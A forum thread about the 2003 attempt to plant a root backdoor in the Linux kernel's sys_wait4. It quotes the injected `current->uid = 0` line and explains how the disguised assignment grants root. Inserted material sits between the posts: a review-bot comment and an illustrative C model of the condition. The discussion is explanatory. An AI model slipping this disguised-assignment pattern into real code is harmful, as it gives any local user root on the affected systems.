Thread: Hacks to be honest

  1. #1
    HEXUS webmaster Steve

    Hacks to be honest

    I love a good hacker story; real ones that is.

    I recently came across a story of an attempt to inject code into the Linux kernel that would give any local user root access on demand. I probably came across the news at the time of the discovery, but was then too uneducated to understand it.

    Still, now I find it's a very interesting story and highlights just how easy it is to mislead people.

    Back in Nov 2003 somebody noticed somebody had directly modified a CVS tree used in Linux development. At first it seemed like a silly user, or somebody who wasn't doing things properly.

    However, follow the aforelinked mailing list replies and you'll see what was changed by the direct modification:
    Code:
    + if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    + retval = -EINVAL;
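    Review bot: in the first added line the right-hand operand of the && is `current->uid = 0`, which is an assignment, not a comparison. Whenever options equals __WCLONE|__WALL it writes 0 into current->uid, and because the assignment evaluates to 0 the condition is false, so `retval = -EINVAL;` never executes. If a check was intended this should read `current->uid == 0`; the added lines also carry no comment saying why this flag combination needs special handling, so as written the change should be rejected.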
    The code appeared in the file exit.c within the sys_wait4 function, part of the scheduling/queuing system in Linux.

    The second line of code is pointless, but the one before it is potentially very problematic. The first half of the if statement checks for two flags. With the gcc compiler, this half of the if will be evaluated first (I do believe it's not a strict rule in C, however, and some compilers may do it differently?). If it's true, then the second half (after the &&) will be evaluated too.

    First up, the two flags would never logically be set simultaneously (so I've read in the mailing list and other articles on this matter), but somebody could make them so, thus making the second half of the if statement evaluate.

    The only problem is the second half of the statement isn't an evaluation, it's an assignment. "current->uid = 0" doesn't check the user id, it sets it. Bang, bit of root access for you, right there. == and =, there's a big difference.

    Luckily the direct modification was noticed, and the intent of the injected code very quickly discovered, but had the edit been noticed, how long would it have been before it was found?

    Hopefully some of you find stuff like this interesting too. Half of my degree is Computer Science, so I find it interesting by default I guess. Still, thought it was worth sharing
    PHP Code:
    $s = new signature();
    $s->sarcasm()->intellect()->font('Courier New')->display(); 
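
A user-space model of the condition discussed in post #1, added here as an illustration (not code from the thread or from the kernel): it puts the injected form beside the comparison it imitates. `struct task`, `W_CLONE`, `W_ALL` and the helper functions are constructed stand-ins; C evaluates the left operand of `&&` first and the right one only when the left is true.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed stand-ins for the two wait flags named in the post. */
#define W_CLONE 0x80000000u
#define W_ALL   0x40000000u

struct task { unsigned int uid; };   /* hypothetical model of `current` */

/* The condition as injected: the right operand of && is an assignment. */
static int check_injected(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (W_CLONE | W_ALL)) && (current->uid = 0))
        retval = -EINVAL;            /* unreachable: (uid = 0) is false */
    return retval;
}

/* The comparison the line imitates: reads uid, never writes it. */
static int check_comparison(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (W_CLONE | W_ALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Call one variant as a caller with start_uid; return the uid afterwards. */
static unsigned int uid_after(int (*check)(struct task *, unsigned int),
                              unsigned int start_uid, unsigned int options,
                              int *retval)
{
    struct task t = { start_uid };
    *retval = check(&t, options);
    return t.uid;
}

int main(void)
{
    int rv;
    unsigned int uid = uid_after(check_injected, 1000, W_CLONE | W_ALL, &rv);
    printf("injected:   uid=%u retval=%d\n", uid, rv);
    uid = uid_after(check_comparison, 1000, W_CLONE | W_ALL, &rv);
    printf("comparison: uid=%u retval=%d\n", uid, rv);
    return 0;
}
```

Because the assignment sits inside its own parentheses, GCC's `-Wparentheses` check does not flag it, so reading the diff is what catches the change.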

  2. #2
    Network|Geek kidzer
    I don't really understand a word of it, but it's an interesting read

    You say half your degree is Comp Sci, what's the other half?
    "If you're not on the edge, you're taking up too much room!"
    - me, 2005

  3. #3
    HEXUS webmaster Steve
    Electronics Engineering.

    I do Computer Systems Engineering, which is basically a mix of the two.

  4. #4
    Grumpy and VERY old :( g8ina
    But do you know which end of a soldering iron gets hot ?

    I had a degree engineer working for me in Saudi in 1980, and the daft budder burned himself cuz he didn't know !!!

    Honestly !!!
    Cheers, David



  5. #5
    HEXUS webmaster Steve
    I can just about remember, although I haven't warmed one up for over a year now... gotta love breadboard!

    That said, my solder skills are OK... not great, but a lot better than some I've seen.

  6. #6
    Network|Geek kidzer
    Oooh, solder...not one of my strong points, I don't like lead-free solder, although I did get better over my first semester.

    Made a PSU and I fixed my floppy drive, that's all the soldering I've done except for a wee radio about 4 years ago!

    Computer Systems Engineering, sounds rather cool

  7. #7
    Grumpy and VERY old :( g8ina
    I soldered my first joint (in a crystal set) at age 8, in 1963/4

    I have electrons in my veins and arteries, not blood !
    Cheers, David


